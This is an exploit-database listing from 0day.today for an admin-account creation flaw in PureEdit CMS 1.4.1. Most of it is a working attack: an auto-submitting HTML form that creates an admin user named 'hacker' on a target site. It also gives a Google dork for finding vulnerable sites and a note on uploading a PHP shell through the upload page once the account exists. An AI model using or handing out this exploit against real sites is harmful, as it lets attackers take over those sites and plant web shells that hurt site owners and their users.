[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PureEdit 1.4.1 Account Creation Vulnerability

Author
pimpim
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13793
Category
web applications
Date add
23-08-2010
Platform
php
=============================================
PureEdit 1.4.1 Account Creation Vulnerability
=============================================

# Exploit Title: PureEdit 1.4.1 Account Creation Vulnerability
# Date: 22/08/2010
# Author: pimpim
# Software Link: http://www.pureedit.com/download/index.php?version=1.4.1
# Version: 1.4.1
# Category:: webapps
# Google dork: intext:"Powered by PureEdit"
# Tested on: Linux
#
#The PureEdit CMS has got a design flaw that allows anybody to create admin accounts.
#Note: The default admin directory is called pe-admin
#Note2: When you have created your account, then you can go to 
#[admin]/centers/uploads.center.php and upload a php-shell

<html>
	<body>
		<form action="http://[victim]/[admin-directory]/centers/accounts.center.php" method="POST">
			<input type="hidden" name="id" value="0"/>
			<input type="hidden" name="title" value="hack"/>
			<input type="hidden" name="email" value="hack@exploit.org"/>
			<input type="hidden" name="website" value="http://www.inj3ct0r.com"/>
			<input type="hidden" name="username" value="hacker"/>
			<input type="hidden" name="password" value="passwd"/>
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>



#  0day.today [2024-12-25]  #